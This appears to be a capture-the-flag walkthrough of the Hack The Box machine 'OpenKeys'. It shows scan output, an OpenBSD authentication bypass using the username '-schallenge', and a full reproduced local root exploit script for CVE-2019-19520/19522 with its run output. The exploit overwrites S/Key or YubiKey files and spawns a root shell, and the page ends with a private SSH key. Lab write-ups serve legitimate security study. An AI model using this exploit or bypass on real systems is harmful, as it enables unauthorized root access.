NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 15:58 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating Ping Scan at 15:58
Scanning 10.10.10.199 [4 ports]
Completed Ping Scan at 15:58, 0.73s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:58
Scanning openkeys.htb (10.10.10.199) [1000 ports]
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
Increasing send delay for 10.10.10.199 from 0 to 5 due to 98 out of 244 dropped probes since last increase.
Increasing send delay for 10.10.10.199 from 5 to 10 due to max_successful_tryno increase to 5
Completed SYN Stealth Scan at 15:59, 48.62s elapsed (1000 total ports)
Initiating Service scan at 15:59
Scanning 2 services on openkeys.htb (10.10.10.199)
Completed Service scan at 15:59, 7.22s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #2) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #3) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #4) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #5) against openkeys.htb (10.10.10.199)
Initiating Traceroute at 15:59
Completed Traceroute at 15:59, 0.31s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:59
Completed Parallel DNS resolution of 2 hosts. at 15:59, 0.19s elapsed
NSE: Script scanning 10.10.10.199.
Initiating NSE at 15:59
Completed NSE at 16:00, 18.99s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 2.11s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/27%OT=22%CT=1%CU=33332%PV=Y%DS=2%DC=T%G=Y%TM=5F1EACA
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=RD%CI=RI%II=RI%TS=21
OS:)OPS(O1=M54DNNSNW6NNT11%O2=M54DNNSNW6NNT11%O3=M54DNW6NNT11%O4=M54DNNSNW6
OS:NNT11%O5=M54DNNSNW6NNT11%O6=M54DNNSNNT11)WIN(W1=4000%W2=4000%W3=4000%W4=
OS:4000%W5=4000%W6=4000)ECN(R=Y%DF=Y%T=40%W=4000%O=M54DNNSNW6%CC=N%Q=)T1(R=
OS:Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=40%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=FF%IPL=38%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=FF%CD=S)
Uptime guess: 0.000 days (since Mon Jul 27 15:59:40 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 299.83 ms 10.10.14.1
2 291.70 ms openkeys.htb (10.10.10.199)
NSE: Script Post-scanning.
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.78 seconds
Raw packets sent: 2488 (113.786KB) | Rcvd: 3558 (167.718KB)
PORT 80
Here we have nothing So lets enumerate!!
GOBUSTER
┌─[root@liquid]─[~/Desktop/HTB/openkeys] └──╼ #gobuster dir -u http://10.10.10.199 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.199 [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/27 16:12:59 Starting gobuster =============================================================== /images (Status: 301) /css (Status: 301) /includes (Status: 301) /js (Status: 301) /vendor (Status: 301)
Here we will have 2 files :
- auth.php
- auth.php.swp
AUTH.PHP.SWP
Here we got another file
Here we got another file /auth_helpers/check_auth
Here we will get username from the file
So rather reversing it we will be buypassing the OPENBSD AUTHENTICATION
For help i took it from my FRIEND @MRCAT
So here we will be Going through this process
USERNAME : -schallenge // PASSWORD : 1234567
After intercepting it through burp just change the cookies to username=jennifer
Here when we will pass it through it will say for OpenSSH key not found for user -schallenge
Also if we read that out carefully we will see that -schallenge will interpret the login username options as command line where it ignores the part after -s
after that we will be getting our SSH keys !!
GETTING USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/openkeys] └──╼ #ssh -i id_rsa jennifer@10.10.10.199 Last login: Mon Jul 27 10:22:24 2020 from 10.10.14.90 OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. openkeys$ ls root user.txt
Here we go with our user flag
Now Lets Go For ROOT ACCESS
GETTING ROOT ACCESSS
Script which will help us in getting root access
As we will be searching for root privilege for OPENBSD
https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot
#!/bin/sh
# openbsd-authroot - OpenBSD local root exploit for CVE-2019-19520 and CVE-2019-19522
# Code mostly stolen from Qualys PoCs:
# - https://www.openwall.com/lists/oss-security/2019/12/04/5
#
# Uses CVE-2019-19520 to gain 'auth' group permissions via xlock;
# and CVE-2019-19520 to gain root permissions via S/Key or YubiKey
# (requires S/Key or YubiKey authentication to be enabled).
# ---
# $ ./openbsd-authroot
# openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
# [*] checking system ...
# [*] system supports YubiKey authentication
# [*] id: uid=1002(test) gid=1002(test) groups=1002(test)
# [*] compiling ...
# [*] running Xvfb ...
# [*] testing for CVE-2019-19520 ...
# (EE)
# Fatal server error:
# (EE) Server is already active for display 66
# If this server is no longer running, remove /tmp/.X66-lock
# and start again.
# (EE)
# [+] success! we have auth group permissions
#
# WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
#
# [*] trying CVE-2019-19522 (YubiKey) ...
# Your password is: krkhgtuhdnjclrikikklulkldlutreul
# Password:
# ksh: /etc/profile[2]: source: not found
# # id
# uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# ---
# 2019-12-06 - <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-19520
echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"
echo "[*] checking system ..."
if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
echo "[*] system supports YubiKey authentication"
target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
echo "[*] system supports S/Key authentication"
target='skey'
if ! test -d /etc/skey/ ; then
echo "[-] S/Key authentication enabled, but has not been initialized"
exit 1
fi
else
echo "[-] system does not support S/Key / YubiKey authentication"
exit 1
fi
echo "[*] id: `id`"
echo "[*] compiling ..."
cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
gid_t rgid, egid, sgid;
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
char * const argv[] = { _PATH_KSHELL, NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF
cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c
echo "[*] running Xvfb ..."
display=":66"
env -i /usr/X11R6/bin/Xvfb $display -cc 0 &
echo "[*] testing for CVE-2019-19520 ..."
group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)
if [ "$group" = "auth" ]; then
echo "[+] success! we have auth group permissions"
else
echo "[-] failed to acquire auth group permissions"
exit 1
fi
# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit
echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5
if [ "$target" = "skey" ]; then
echo "[*] trying CVE-2019-19522 (S/Key) ..."
echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
rm -rf swrast_dri.so
echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
env -i TERM=vt220 su -l -a skey
fi
if [ "$target" = "yubikey" ]; then
echo "[*] trying CVE-2019-19522 (YubiKey) ..."
echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
rm -rf swrast_dri.so
echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
env -i TERM=vt220 su -l -a yubikey
fi
So just save this exploit in the jennifer home folder and run this exploit
openkeys$ ./root openbsd-authroot (CVE-2019-19520 / CVE-2019-19522) [*] checking system ... [*] system supports S/Key authentication [*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel) [*] compiling ... [*] running Xvfb ... [*] testing for CVE-2019-19520 ... _XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created. [+] success! we have auth group permissions WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C). [*] trying CVE-2019-19522 (S/Key) ... Your password is: EGG LARD GROW HOG DRAG LAIN otp-md5 99 obsd91335 S/Key Password: openkeys# id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) openkeys# cd /root openkeys# ls .Xdefaults .composer .cshrc .cvsrc .forward .login .profile .ssh .viminfo dead.letter root.txt openkeys# cat root.txt f3a553b1697050ae885e7c02dbfc6efa
Here we go with our root flag!!
ID_RSA JENNIFER
-----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
wow.. that great..